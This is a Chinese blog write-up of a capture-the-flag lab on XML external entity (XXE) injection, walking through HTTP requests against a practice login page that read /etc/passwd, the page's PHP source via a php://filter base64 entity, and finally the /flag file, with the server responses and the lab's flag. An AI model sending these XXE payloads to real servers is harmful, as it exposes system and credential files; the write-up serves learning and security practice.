安鸾之XXE漏洞
涂寐 Lv4

前言

本文章起笔时神烦,用打下靶场转移下思绪。
注:本教程仅供学习参考,请勿用在非法途径上,违者后果自负,与笔者无关。 –涂寐

笔记

靶场信息

1
2
3
4
XML外部实体注入,简称XXE
网站URL:http://www.whalwl.work:8016/

提示:flag文件在服务器根目录下,文件名为flag

通关记录

  1. 登录框当然先是一波弱口令,admin/admin,有提示弹窗。改下密码看效果

    1
    2
    admin 登陆成功!
    admin 登陆失败!
  2. 好吧,直接尝试写入xml文档,得到一堆报错信息

    1
    2
    3
    4
    5
    <?xml version="1.0"  encoding="UTF-8"?>
    <!DOCTYPE note [
    <!ENTITY tumei SYSTEM "file:///etc/passwd">
    ]>
    <name>&tumei;</name>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    Error: Invalid XML: 

    <b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: XML declaration allowed only at the start of the document in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>



    <b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: StartTag: invalid element name in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>



    <b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: StartTag: invalid element name in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>



    <b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Entity 'tumei' not defined in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>



    <b>Warning</b>: simplexml_import_dom() [<a href='function.simplexml-import-dom'>function.simplexml-import-dom</a>]: Invalid Nodetype to import in <b>/var/www/html/doLogin.php</b> on line <b>13</b>



    <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/html/doLogin.php:12) in <b>/var/www/html/doLogin.php</b> on line <b>27</b>

    <result><code>0</code><msg></msg></result>:parsererror
  3. 简要分析下报错,先看下某翻译的效果;说下收获,拿到了物理路径

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    错误:无效的XML:<br/>
    <b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:仅允许在<b>/var/www/html/doLogin中的实体第1行的文档开头进行XML声明。php</b>在线<b>12</b><br/>
    <br/>
    <b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:StartTag:Entity中的元素名称无效,<b>/var/www/html/doLogin中的第1行。php</b>在线<b>12</b><br/>
    <br/>
    <b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:StartTag:Entity中的元素名称无效,<b>/var/www/html/doLogin中的第1行。php</b>在线<b>12</b><br/>
    <br/>
    <b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:未在<b>/var/www/html/doLogin中的实体第1行中定义实体“tumei”。php</b>在线<b>12</b><br/>
    <br/>
    <b>警告:simplexml导入dom()[<a href='function.simplexml导入dom'>函数。simplexml导入dom</a>]:要在<b>/var/www/html/doLogin中导入的节点类型无效。php</b>在线<b>13</b><br/>
    <br/>
    <b>警告</b>:无法修改标题信息-标题已由<b>/var/www/html/doLogin中的(输出开始于/var/www/html/doLogin.php:12)发送。php</b>在线<b>27</b><br/>
    <result><code>0</code><msg></msg></result>:解析器错误
  4. 算啦,去bp抓个包看下请求

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    # 以下注释仅笔者理解,欢迎提出不同意见
    POST /doLogin.php HTTP/1.1
    Host: www.whalwl.work:8016
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    # 请求头,表示发送端(客户端)希望接受的数据类型
    Accept: application/xml, text/xml, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    # 实体头,表示发送端(客户端|服务器)发送的实体数据的数据类型
    Content-Type: application/xml;charset=utf-8
    # 请求方式,XMLHttpRequest 则为 Ajax 请求(异步HTTP)
    X-Requested-With: XMLHttpRequest
    Referer: http://www.whalwl.work:8016/
    Content-Length: 65
    DNT: 1
    Connection: close

    <user><username>admin</username><password>admin</password></user>
  5. 观察部分请求头(Accept)可知通过xml传参,构造请求参数,恭喜你得到新的报错

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    POST /doLogin.php HTTP/1.1
    Host: www.whalwl.work:8016
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: application/xml, text/xml, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/xml;charset=utf-8
    X-Requested-With: XMLHttpRequest
    Referer: http://www.whalwl.work:8016/
    Content-Length: 225
    DNT: 1
    Connection: close

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE note [
    <!ENTITY tumei SYSTEM "file:///etc/passwd">
    ]>
    <name>&tumei;</name>
    <user><username>admin</username><password>admin</password></user>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18


    <b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Input is not proper UTF-8, indicate encoding !
    Bytes: 0x81 0xFB 0xD6 0x84 in Entity, line: 3 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>



    <b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Extra content at the end of the document in Entity, line: 6 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>



    <b>Warning</b>: simplexml_import_dom() [<a href='function.simplexml-import-dom'>function.simplexml-import-dom</a>]: Invalid Nodetype to import in <b>/var/www/html/doLogin.php</b> on line <b>13</b>



    <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/html/doLogin.php:12) in <b>/var/www/html/doLogin.php</b> on line <b>27</b>

    <result><code>0</code><msg></msg></result>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    <br/>
    <b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:输入不正确,请指示编码!
    字节:0x81 0xFB 0xD6 0x84在实体中,第3行在<b>/var/www/html/doLogin中。php</b>在线<b>12</b><br/>
    <br/>
    <b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:实体中文档末尾的额外内容,第6行,在<b>/var/www/html/doLogin中。php</b>在线<b>12</b><br/>
    <br/>
    <b>警告:simplexml导入dom()[<a href='function.simplexml导入dom'>函数。simplexml导入dom</a>]:要在<b>/var/www/html/doLogin中导入的节点类型无效。php</b>在线<b>13</b><br/>
    <br/>
    <b>警告</b>:无法修改标题信息-标题已由<b>/var/www/html/doLogin中的(输出开始于/var/www/html/doLogin.php:12)发送。php</b>在线<b>27</b><br/>
    <result><code>0</code><msg></msg></result>
  6. 把参数 &tumei; 作为 username 标签的内容,突如其来呀(应该是我太菜了)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    POST /doLogin.php HTTP/1.1
    Host: www.whalwl.work:8016
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: application/xml, text/xml, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/xml;charset=utf-8
    X-Requested-With: XMLHttpRequest
    Referer: http://www.whalwl.work:8016/
    Content-Length: 176
    DNT: 1
    Connection: close

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE note [
    <!ENTITY tumei SYSTEM "file:///etc/passwd">
    ]>
    <user><username>&tumei;</username><password>admin</password></user>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    HTTP/1.1 200 OK
    Date: Sun, 09 Jan 2022 03:04:32 GMT
    Server: Apache/2.4.10 (Debian) PHP/5.3.29
    X-Powered-By: PHP/5.3.29
    Vary: Accept-Encoding
    Content-Length: 1330
    Connection: close
    Content-Type: text/html; charset=utf-8

    <result><code>0</code><msg>root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    systemd-timesync:x:101:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
    systemd-network:x:102:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve:x:103:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-bus-proxy:x:104:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
    messagebus:x:105:108::/var/run/dbus:/bin/false
    </msg></result>
  7. 换个方法,用php伪协议结合base64编码进行读取网页源码

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # 改用原因: 读取源代码并进行base64编码输出,避免php源码文件直接解析输出
    # 此处文件路径可写为绝对路径(之前报错提供):/var/www/html/doLogin.php
    POST /doLogin.php HTTP/1.1
    Host: www.whalwl.work:8016
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: application/xml, text/xml, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/xml;charset=utf-8
    X-Requested-With: XMLHttpRequest
    Referer: http://www.whalwl.work:8016/
    Content-Length: 203
    DNT: 1
    Connection: close

    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY tumei SYSTEM "php://filter/read=convert.base64-encode/resource=./doLogin.php">
    ]>
    <user><username>&tumei;</username><password>admin</password></user>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    HTTP/1.1 200 OK
    Date: Sun, 09 Jan 2022 03:16:00 GMT
    Server: Apache/2.4.10 (Debian) PHP/5.3.29
    X-Powered-By: PHP/5.3.29
    Vary: Accept-Encoding
    Content-Length: 1066
    Connection: close
    Content-Type: text/html; charset=utf-8

    <result><code>0</code><msg>PD9waHAKCiRVU0VSTkFNRSA9ICdhZG1pbic7IC8v6LSm5Y+3CiRQQVNTV09SRCA9ICdhZG1pbic7IC8v5a+G56CBCiRyZXN1bHQgPSBudWxsOwoKbGlieG1sX2Rpc2FibGVfZW50aXR5X2xvYWRlcihmYWxzZSk7CiR4bWxmaWxlID0gZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0Jyk7Cgp0cnl7CgkkZG9tID0gbmV3IERPTURvY3VtZW50KCk7CgkkZG9tLT5sb2FkWE1MKCR4bWxmaWxlLCBMSUJYTUxfTk9FTlQgfCBMSUJYTUxfRFRETE9BRCk7CgkkY3JlZHMgPSBzaW1wbGV4bWxfaW1wb3J0X2RvbSgkZG9tKTsKCgkkdXNlcm5hbWUgPSAkY3JlZHMtPnVzZXJuYW1lOwoJJHBhc3N3b3JkID0gJGNyZWRzLT5wYXNzd29yZDsKCglpZigkdXNlcm5hbWUgPT0gJFVTRVJOQU1FICYmICRwYXNzd29yZCA9PSAkUEFTU1dPUkQpewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDEsJHVzZXJuYW1lKTsKCX1lbHNlewoJCSRyZXN1bHQgPSBzcHJpbnRmKCI8cmVzdWx0Pjxjb2RlPiVkPC9jb2RlPjxtc2c+JXM8L21zZz48L3Jlc3VsdD4iLDAsJHVzZXJuYW1lKTsKCX0JCn1jYXRjaChFeGNlcHRpb24gJGUpewoJJHJlc3VsdCA9IHNwcmludGYoIjxyZXN1bHQ+PGNvZGU+JWQ8L2NvZGU+PG1zZz4lczwvbXNnPjwvcmVzdWx0PiIsMywkZS0+Z2V0TWVzc2FnZSgpKTsKfQoKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwplY2hvICRyZXN1bHQ7Cj8+</msg></result>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    <?php

    $USERNAME = 'admin'; //账号
    $PASSWORD = 'admin'; //密码
    $result = null;

    libxml_disable_entity_loader(false);
    $xmlfile = file_get_contents('php://input');

    try{
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);

    $username = $creds->username;
    $password = $creds->password;

    if($username == $USERNAME && $password == $PASSWORD){
    $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
    }else{
    $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
    }
    }catch(Exception $e){
    $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
    }

    header('Content-Type: text/html; charset=utf-8');
    echo $result;
    ?>
  8. 好吧,只能读取文件,可笔者需要一个查看目录的方法定位flag的位置
    ……回去审一下题,是我唐突了,赤果果地提供路劲:/flag

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    POST /doLogin.php HTTP/1.1
    Host: www.whalwl.work:8016
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: application/xml, text/xml, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/xml;charset=utf-8
    X-Requested-With: XMLHttpRequest
    Referer: http://www.whalwl.work:8016/
    Content-Length: 195
    DNT: 1
    Connection: close

    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY tumei SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    ]>
    <user><username>&tumei;</username><password>admin</password></user>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    HTTP/1.1 200 OK
    Date: Wed, 12 Jan 2022 16:20:19 GMT
    Server: Apache/2.4.10 (Debian) PHP/5.3.29
    X-Powered-By: PHP/5.3.29
    Vary: Accept-Encoding
    Content-Length: 94
    Connection: close
    Content-Type: text/html; charset=utf-8

    <result><code>0</code><msg>ZmxhZ3tkOTdhYTY5YjAzNGQ2YjlhZjc0MmJkM2M2M2QxNWYwOX0=</msg></result>
  9. 可以直接用firl://协议,省个解码的步骤

    1
    flag{d97aa69b034d6b9af742bd3c63d15f09}

    后记

    太冷了,想着明早再瞅瞅,结果还是继续了,幸运的是拿下了。
    有些憨,居然审题不清,阔以,又找到一个缺点。

  • 本文标题:安鸾之XXE漏洞
  • 本文作者:涂寐
  • 创建时间:2022-01-13 00:35:27
  • 本文链接:https://0xtlu.github.io/article/10a5a8a4.html
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
 评论